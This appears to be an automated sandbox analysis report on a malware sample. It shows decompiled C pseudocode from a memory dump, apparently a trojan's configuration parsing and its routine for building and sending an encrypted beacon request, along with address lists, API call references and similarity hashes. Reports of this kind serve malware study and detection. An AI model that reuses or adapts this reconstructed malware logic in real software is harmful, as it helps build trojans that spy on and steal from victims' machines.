						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0xa9d02c = _v8;
						}
					}
					if(_t103 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0xa9d2dc; // 0x69b25f44
						_t50 = E00A9A7ED(_t104, _t103, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0xa9d284 = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t103 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0xa9d2dc; // 0x69b25f44
								_t51 = E00A9A7ED(_t104, _t103, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E00A91685(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E00A97095();
								}
							}
							if(_t103 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0xa9d2dc; // 0x69b25f44
								_t52 = E00A9A7ED(_t104, _t103, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E00A91685(0, _t52) != 0) {
								_t121 =  *0xa9d364; // 0x4fd95b0
								E00A945CF(_t121 + 4, _t68);
							}
							if(_t103 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0xa9d2dc; // 0x69b25f44
								_t53 = E00A9A7ED(_t104, _t103, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0xa9d2e0; // 0x453a5a8
								_t22 = _t54 + 0xa9e252; // 0x616d692f
								 *0xa9d30c = _t22;
								goto L60;
							} else {
								_t64 = E00A91685(0, _t53);
								 *0xa9d30c = _t64;
								if(_t64 != 0) {
									L60:
									if(_t103 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0xa9d2dc; // 0x69b25f44
										_t56 = E00A9A7ED(_t104, _t103, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0xa9d2e0; // 0x453a5a8
										_t23 = _t57 + 0xa9e79a; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E00A91685(0, _t56);
									}
									 *0xa9d380 = _t58;
									HeapFree( *0xa9d270, 0, _t103);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}






































                                                                                                                                                                                                                                0x00a9235b
                                                                                                                                                                                                                                0x00a9235e
                                                                                                                                                                                                                                0x00a9237e
                                                                                                                                                                                                                                0x00a9238c
                                                                                                                                                                                                                                0x00a9238c
                                                                                                                                                                                                                                0x00a92391
                                                                                                                                                                                                                                0x00a923ab
                                                                                                                                                                                                                                0x00a92613
                                                                                                                                                                                                                                0x00a9261a
                                                                                                                                                                                                                                0x00a92621
                                                                                                                                                                                                                                0x00a92621
                                                                                                                                                                                                                                0x00a923b1
                                                                                                                                                                                                                                0x00a923cd
                                                                                                                                                                                                                                0x00a92601
                                                                                                                                                                                                                                0x00a9260b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a923d3
                                                                                                                                                                                                                                0x00a923d3
                                                                                                                                                                                                                                0x00a923d8
                                                                                                                                                                                                                                0x00a923ee
                                                                                                                                                                                                                                0x00a923da
                                                                                                                                                                                                                                0x00a923da
                                                                                                                                                                                                                                0x00a923e7
                                                                                                                                                                                                                                0x00a923e7
                                                                                                                                                                                                                                0x00a923f8
                                                                                                                                                                                                                                0x00a923fa
                                                                                                                                                                                                                                0x00a92404
                                                                                                                                                                                                                                0x00a92409
                                                                                                                                                                                                                                0x00a92409
                                                                                                                                                                                                                                0x00a92404
                                                                                                                                                                                                                                0x00a92410
                                                                                                                                                                                                                                0x00a92426
                                                                                                                                                                                                                                0x00a92412
                                                                                                                                                                                                                                0x00a92412
                                                                                                                                                                                                                                0x00a9241f
                                                                                                                                                                                                                                0x00a9241f
                                                                                                                                                                                                                                0x00a9242a
                                                                                                                                                                                                                                0x00a9242c
                                                                                                                                                                                                                                0x00a92436
                                                                                                                                                                                                                                0x00a9243b
                                                                                                                                                                                                                                0x00a9243b
                                                                                                                                                                                                                                0x00a92436
                                                                                                                                                                                                                                0x00a92442
                                                                                                                                                                                                                                0x00a92458
                                                                                                                                                                                                                                0x00a92444
                                                                                                                                                                                                                                0x00a92444
                                                                                                                                                                                                                                0x00a92451
                                                                                                                                                                                                                                0x00a92451
                                                                                                                                                                                                                                0x00a9245c
                                                                                                                                                                                                                                0x00a9245e
                                                                                                                                                                                                                                0x00a92468
                                                                                                                                                                                                                                0x00a9246d
                                                                                                                                                                                                                                0x00a9246d
                                                                                                                                                                                                                                0x00a92468
                                                                                                                                                                                                                                0x00a92474
                                                                                                                                                                                                                                0x00a9248a
                                                                                                                                                                                                                                0x00a92476
                                                                                                                                                                                                                                0x00a92476
                                                                                                                                                                                                                                0x00a92483
                                                                                                                                                                                                                                0x00a92483
                                                                                                                                                                                                                                0x00a9248e
                                                                                                                                                                                                                                0x00a92490
                                                                                                                                                                                                                                0x00a9249a
                                                                                                                                                                                                                                0x00a9249f
                                                                                                                                                                                                                                0x00a9249f
                                                                                                                                                                                                                                0x00a9249a
                                                                                                                                                                                                                                0x00a924a6
                                                                                                                                                                                                                                0x00a924bc
                                                                                                                                                                                                                                0x00a924a8
                                                                                                                                                                                                                                0x00a924a8
                                                                                                                                                                                                                                0x00a924b5
                                                                                                                                                                                                                                0x00a924b5
                                                                                                                                                                                                                                0x00a924c0
                                                                                                                                                                                                                                0x00a924c2
                                                                                                                                                                                                                                0x00a924cc
                                                                                                                                                                                                                                0x00a924d1
                                                                                                                                                                                                                                0x00a924d1
                                                                                                                                                                                                                                0x00a924cc
                                                                                                                                                                                                                                0x00a924d8
                                                                                                                                                                                                                                0x00a924ee
                                                                                                                                                                                                                                0x00a924da
                                                                                                                                                                                                                                0x00a924da
                                                                                                                                                                                                                                0x00a924e7
                                                                                                                                                                                                                                0x00a924e7
                                                                                                                                                                                                                                0x00a924f2
                                                                                                                                                                                                                                0x00a92505
                                                                                                                                                                                                                                0x00a92505
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a924f4
                                                                                                                                                                                                                                0x00a924f4
                                                                                                                                                                                                                                0x00a924fe
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9250f
                                                                                                                                                                                                                                0x00a9250f
                                                                                                                                                                                                                                0x00a92511
                                                                                                                                                                                                                                0x00a92527
                                                                                                                                                                                                                                0x00a92513
                                                                                                                                                                                                                                0x00a92513
                                                                                                                                                                                                                                0x00a92520
                                                                                                                                                                                                                                0x00a92520
                                                                                                                                                                                                                                0x00a9252b
                                                                                                                                                                                                                                0x00a9252d
                                                                                                                                                                                                                                0x00a92530
                                                                                                                                                                                                                                0x00a92531
                                                                                                                                                                                                                                0x00a92538
                                                                                                                                                                                                                                0x00a9253a
                                                                                                                                                                                                                                0x00a9253b
                                                                                                                                                                                                                                0x00a9253b
                                                                                                                                                                                                                                0x00a92538
                                                                                                                                                                                                                                0x00a92542
                                                                                                                                                                                                                                0x00a92558
                                                                                                                                                                                                                                0x00a92544
                                                                                                                                                                                                                                0x00a92544
                                                                                                                                                                                                                                0x00a92551
                                                                                                                                                                                                                                0x00a92551
                                                                                                                                                                                                                                0x00a9255c
                                                                                                                                                                                                                                0x00a9256a
                                                                                                                                                                                                                                0x00a92574
                                                                                                                                                                                                                                0x00a92574
                                                                                                                                                                                                                                0x00a9257b
                                                                                                                                                                                                                                0x00a92591
                                                                                                                                                                                                                                0x00a9257d
                                                                                                                                                                                                                                0x00a9257d
                                                                                                                                                                                                                                0x00a9258a
                                                                                                                                                                                                                                0x00a9258a
                                                                                                                                                                                                                                0x00a92595
                                                                                                                                                                                                                                0x00a925a8
                                                                                                                                                                                                                                0x00a925a8
                                                                                                                                                                                                                                0x00a925ad
                                                                                                                                                                                                                                0x00a925b3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a92597
                                                                                                                                                                                                                                0x00a9259a
                                                                                                                                                                                                                                0x00a9259f
                                                                                                                                                                                                                                0x00a925a6
                                                                                                                                                                                                                                0x00a925b8
                                                                                                                                                                                                                                0x00a925ba
                                                                                                                                                                                                                                0x00a925d0
                                                                                                                                                                                                                                0x00a925bc
                                                                                                                                                                                                                                0x00a925bc
                                                                                                                                                                                                                                0x00a925c9
                                                                                                                                                                                                                                0x00a925c9
                                                                                                                                                                                                                                0x00a925d4
                                                                                                                                                                                                                                0x00a925e0
                                                                                                                                                                                                                                0x00a925e5
                                                                                                                                                                                                                                0x00a925e5
                                                                                                                                                                                                                                0x00a925d6
                                                                                                                                                                                                                                0x00a925d9
                                                                                                                                                                                                                                0x00a925d9
                                                                                                                                                                                                                                0x00a925f3
                                                                                                                                                                                                                                0x00a925f8
                                                                                                                                                                                                                                0x00a925fe
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a925fe
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a925a6
                                                                                                                                                                                                                                0x00a92595
                                                                                                                                                                                                                                0x00a924fe
                                                                                                                                                                                                                                0x00a924f2

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00A95884,?,69B25F44,?,00A95884,69B25F44,?,00A95884,69B25F44,00000005,00A9D00C,00000008), ref: 00A92400
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00A95884,?,69B25F44,?,00A95884,69B25F44,?,00A95884,69B25F44,00000005,00A9D00C,00000008), ref: 00A92432
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00A95884,?,69B25F44,?,00A95884,69B25F44,?,00A95884,69B25F44,00000005,00A9D00C,00000008), ref: 00A92464
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00A95884,?,69B25F44,?,00A95884,69B25F44,?,00A95884,69B25F44,00000005,00A9D00C,00000008), ref: 00A92496
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00A95884,?,69B25F44,?,00A95884,69B25F44,?,00A95884,69B25F44,00000005,00A9D00C,00000008), ref: 00A924C8
                                                                                                                                                                                                                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00A95884,?,69B25F44,?,00A95884,69B25F44,?,00A95884,69B25F44,00000005,00A9D00C,00000008), ref: 00A924FA
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00A95884,00A95884,?,69B25F44,?,00A95884,69B25F44,?,00A95884,69B25F44,00000005,00A9D00C,00000008,?,00A95884), ref: 00A925F8
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00A95884,?,69B25F44,?,00A95884,69B25F44,?,00A95884,69B25F44,00000005,00A9D00C,00000008,?,00A95884), ref: 00A9260B
                                                                                                                                                                                                                                  • Part of subcall function 00A91685: lstrlen.KERNEL32(69B25F44,00000000,767FD3B0,00A95884,00A925DE,00000000,00A95884,?,69B25F44,?,00A95884,69B25F44,?,00A95884,69B25F44,00000005), ref: 00A9168E
                                                                                                                                                                                                                                  • Part of subcall function 00A91685: memcpy.NTDLL(00000000,?,00000000,00000001,?,00A95884), ref: 00A916B1
                                                                                                                                                                                                                                  • Part of subcall function 00A91685: memset.NTDLL ref: 00A916C0
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap$lstrlenmemcpymemset
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3442150357-1536154274
                                                                                                                                                                                                                                • Opcode ID: 6464e3987146eef3e4626f6b1cc807623af8ea4fda58439fb2069085727f975d
                                                                                                                                                                                                                                • Instruction ID: 4063e49bbb1e6d0de4bbaaa939d33b07e614547b9d4aa87f20f499ee5fbc54ed
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6464e3987146eef3e4626f6b1cc807623af8ea4fda58439fb2069085727f975d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2815270B10204BFCF21DBF4DE85EAF77F9AB88700B254926A402D7115EE39DD819B61
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A970F4, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 244memorystringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                			E00A970F4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0xa9d018; // 0x9ad51634
				asm("bswap eax");
				_t61 =  *0xa9d014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0xa9d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0xa9d00c; // 0x13d015ef
				asm("bswap eax");
				_t64 =  *0xa9d2e0; // 0x453a5a8
				_t3 = _t64 + 0xa9e633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3f878, _t63, _t62, _t61, _t60,  *0xa9d02c,  *0xa9d004, _t59);
				_t67 = E00A95C12();
				_t68 =  *0xa9d2e0; // 0x453a5a8
				_t4 = _t68 + 0xa9e673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E00A9508C(_t134);
				_t133 = __imp__; // 0x74785520
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0xa9d2e0; // 0x453a5a8
					_t7 = _t126 + 0xa9e8cc; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0xa9d270, 0, _v8);
				}
				_t73 = E00A96706();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0xa9d2e0; // 0x453a5a8
					_t11 = _t121 + 0xa9e8d4; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0xa9d270, 0, _v8);
				}
				_t146 =  *0xa9d364; // 0x4fd95b0
				_t75 = E00A96DFA(0xa9d00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0xa9d270, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0xa9d270, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0xa9d270, _t152, _v20);
						goto L26;
					}
					E00A9A425(GetTickCount());
					_t82 =  *0xa9d364; // 0x4fd95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0xa9d364; // 0x4fd95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0xa9d364; // 0x4fd95b0
					_t148 = E00A922AB(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0xa9d270, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0xa9c2ac);
					_push(_t148);
					_t94 = E00A92629();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0xa9d270, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E00A93037( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E00A9651D();
						L22:
						HeapFree( *0xa9d270, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E00A9145F(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E00A92EA6(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E00A953BB(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E00A91522(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E00A953BB(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}





















































                                                                                                                                                                                                                                0x00a970f4
                                                                                                                                                                                                                                0x00a970f4
                                                                                                                                                                                                                                0x00a970f4
                                                                                                                                                                                                                                0x00a970fd
                                                                                                                                                                                                                                0x00a97106
                                                                                                                                                                                                                                0x00a97108
                                                                                                                                                                                                                                0x00a97108
                                                                                                                                                                                                                                0x00a97115
                                                                                                                                                                                                                                0x00a97120
                                                                                                                                                                                                                                0x00a97123
                                                                                                                                                                                                                                0x00a97128
                                                                                                                                                                                                                                0x00a97131
                                                                                                                                                                                                                                0x00a97134
                                                                                                                                                                                                                                0x00a97139
                                                                                                                                                                                                                                0x00a9713c
                                                                                                                                                                                                                                0x00a97141
                                                                                                                                                                                                                                0x00a97144
                                                                                                                                                                                                                                0x00a97150
                                                                                                                                                                                                                                0x00a9715d
                                                                                                                                                                                                                                0x00a9715f
                                                                                                                                                                                                                                0x00a97165
                                                                                                                                                                                                                                0x00a9716a
                                                                                                                                                                                                                                0x00a97175
                                                                                                                                                                                                                                0x00a97177
                                                                                                                                                                                                                                0x00a9717a
                                                                                                                                                                                                                                0x00a9717c
                                                                                                                                                                                                                                0x00a97181
                                                                                                                                                                                                                                0x00a97187
                                                                                                                                                                                                                                0x00a9718c
                                                                                                                                                                                                                                0x00a9718f
                                                                                                                                                                                                                                0x00a97194
                                                                                                                                                                                                                                0x00a971a1
                                                                                                                                                                                                                                0x00a971a3
                                                                                                                                                                                                                                0x00a971a9
                                                                                                                                                                                                                                0x00a971b3
                                                                                                                                                                                                                                0x00a971b3
                                                                                                                                                                                                                                0x00a971b5
                                                                                                                                                                                                                                0x00a971ba
                                                                                                                                                                                                                                0x00a971bf
                                                                                                                                                                                                                                0x00a971c2
                                                                                                                                                                                                                                0x00a971c7
                                                                                                                                                                                                                                0x00a971d4
                                                                                                                                                                                                                                0x00a971d6
                                                                                                                                                                                                                                0x00a971e4
                                                                                                                                                                                                                                0x00a971e4
                                                                                                                                                                                                                                0x00a971e6
                                                                                                                                                                                                                                0x00a971f4
                                                                                                                                                                                                                                0x00a971f9
                                                                                                                                                                                                                                0x00a971fb
                                                                                                                                                                                                                                0x00a97200
                                                                                                                                                                                                                                0x00a973c1
                                                                                                                                                                                                                                0x00a973cb
                                                                                                                                                                                                                                0x00a973d4
                                                                                                                                                                                                                                0x00a97206
                                                                                                                                                                                                                                0x00a97212
                                                                                                                                                                                                                                0x00a97218
                                                                                                                                                                                                                                0x00a9721d
                                                                                                                                                                                                                                0x00a973b5
                                                                                                                                                                                                                                0x00a973bf
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a973bf
                                                                                                                                                                                                                                0x00a97229
                                                                                                                                                                                                                                0x00a9722e
                                                                                                                                                                                                                                0x00a97237
                                                                                                                                                                                                                                0x00a97248
                                                                                                                                                                                                                                0x00a9724c
                                                                                                                                                                                                                                0x00a97255
                                                                                                                                                                                                                                0x00a9725b
                                                                                                                                                                                                                                0x00a9726a
                                                                                                                                                                                                                                0x00a97271
                                                                                                                                                                                                                                0x00a9727a
                                                                                                                                                                                                                                0x00a97280
                                                                                                                                                                                                                                0x00a973a9
                                                                                                                                                                                                                                0x00a973b3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a973b3
                                                                                                                                                                                                                                0x00a9728c
                                                                                                                                                                                                                                0x00a97292
                                                                                                                                                                                                                                0x00a97293
                                                                                                                                                                                                                                0x00a97298
                                                                                                                                                                                                                                0x00a9729d
                                                                                                                                                                                                                                0x00a9739f
                                                                                                                                                                                                                                0x00a973a7
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a973a7
                                                                                                                                                                                                                                0x00a972a6
                                                                                                                                                                                                                                0x00a972ad
                                                                                                                                                                                                                                0x00a972b5
                                                                                                                                                                                                                                0x00a972ba
                                                                                                                                                                                                                                0x00a972c3
                                                                                                                                                                                                                                0x00a972ce
                                                                                                                                                                                                                                0x00a972d3
                                                                                                                                                                                                                                0x00a972d8
                                                                                                                                                                                                                                0x00a973d7
                                                                                                                                                                                                                                0x00a9738b
                                                                                                                                                                                                                                0x00a9738b
                                                                                                                                                                                                                                0x00a97390
                                                                                                                                                                                                                                0x00a9739b
                                                                                                                                                                                                                                0x00a9739d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9739d
                                                                                                                                                                                                                                0x00a972e2
                                                                                                                                                                                                                                0x00a972e7
                                                                                                                                                                                                                                0x00a972ec
                                                                                                                                                                                                                                0x00a972f1
                                                                                                                                                                                                                                0x00a97301
                                                                                                                                                                                                                                0x00a97304
                                                                                                                                                                                                                                0x00a9730a
                                                                                                                                                                                                                                0x00a97310
                                                                                                                                                                                                                                0x00a97316
                                                                                                                                                                                                                                0x00a97319
                                                                                                                                                                                                                                0x00a9731f
                                                                                                                                                                                                                                0x00a97322
                                                                                                                                                                                                                                0x00a97327
                                                                                                                                                                                                                                0x00a9732b
                                                                                                                                                                                                                                0x00a9732b
                                                                                                                                                                                                                                0x00a97337
                                                                                                                                                                                                                                0x00a97343
                                                                                                                                                                                                                                0x00a97347
                                                                                                                                                                                                                                0x00a97349
                                                                                                                                                                                                                                0x00a9734e
                                                                                                                                                                                                                                0x00a97350
                                                                                                                                                                                                                                0x00a97355
                                                                                                                                                                                                                                0x00a9735a
                                                                                                                                                                                                                                0x00a97367
                                                                                                                                                                                                                                0x00a9736f
                                                                                                                                                                                                                                0x00a97372
                                                                                                                                                                                                                                0x00a97372
                                                                                                                                                                                                                                0x00a9734e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a97339
                                                                                                                                                                                                                                0x00a9733d
                                                                                                                                                                                                                                0x00a97374
                                                                                                                                                                                                                                0x00a97377
                                                                                                                                                                                                                                0x00a97380
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a97380
                                                                                                                                                                                                                                0x00a9733f
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9733f
                                                                                                                                                                                                                                0x00a97337

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A97108
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A97158
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A97175
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A971A1
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?), ref: 00A971B3
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A971D4
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?), ref: 00A971E4
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A97212
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A97223
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(04FD9570), ref: 00A97237
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(04FD9570), ref: 00A97255
                                                                                                                                                                                                                                  • Part of subcall function 00A922AB: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,00A9A714,?,04FD95B0), ref: 00A922D6
                                                                                                                                                                                                                                  • Part of subcall function 00A922AB: lstrlen.KERNEL32(?,?,?,00A9A714,?,04FD95B0), ref: 00A922DE
                                                                                                                                                                                                                                  • Part of subcall function 00A922AB: strcpy.NTDLL ref: 00A922F5
                                                                                                                                                                                                                                  • Part of subcall function 00A922AB: lstrcat.KERNEL32(00000000,?), ref: 00A92300
                                                                                                                                                                                                                                  • Part of subcall function 00A922AB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00A9A714,?,04FD95B0), ref: 00A9231D
                                                                                                                                                                                                                                • StrTrimA.SHLWAPI(00000000,00A9C2AC,?,04FD95B0), ref: 00A9728C
                                                                                                                                                                                                                                  • Part of subcall function 00A92629: lstrlen.KERNEL32(04FD9B98,00000000,00000000,770CC740,00A9A73F,00000000), ref: 00A92639
                                                                                                                                                                                                                                  • Part of subcall function 00A92629: lstrlen.KERNEL32(?), ref: 00A92641
                                                                                                                                                                                                                                  • Part of subcall function 00A92629: lstrcpy.KERNEL32(00000000,04FD9B98), ref: 00A92655
                                                                                                                                                                                                                                  • Part of subcall function 00A92629: lstrcat.KERNEL32(00000000,?), ref: 00A92660
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,?), ref: 00A972AD
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 00A972B5
                                                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00A972C3
                                                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00A972C9
                                                                                                                                                                                                                                  • Part of subcall function 00A93037: lstrlen.KERNEL32(?,00000000,04FD9BB8,00000000,00A96F37,04FD9D96,?,?,?,?,?,69B25F44,00000005,00A9D00C), ref: 00A9303E
                                                                                                                                                                                                                                  • Part of subcall function 00A93037: mbstowcs.NTDLL ref: 00A93067
                                                                                                                                                                                                                                  • Part of subcall function 00A93037: memset.NTDLL ref: 00A93079
                                                                                                                                                                                                                                • wcstombs.NTDLL ref: 00A9735A
                                                                                                                                                                                                                                  • Part of subcall function 00A92EA6: SysAllocString.OLEAUT32(?), ref: 00A92EE1
                                                                                                                                                                                                                                  • Part of subcall function 00A953BB: RtlFreeHeap.NTDLL(00000000,00000000,00A912FA,00000000,?,?,00000000), ref: 00A953C7
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?), ref: 00A9739B
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00A973A7
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,04FD95B0), ref: 00A973B3
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?), ref: 00A973BF
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?), ref: 00A973CB
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3748877296-1536154274
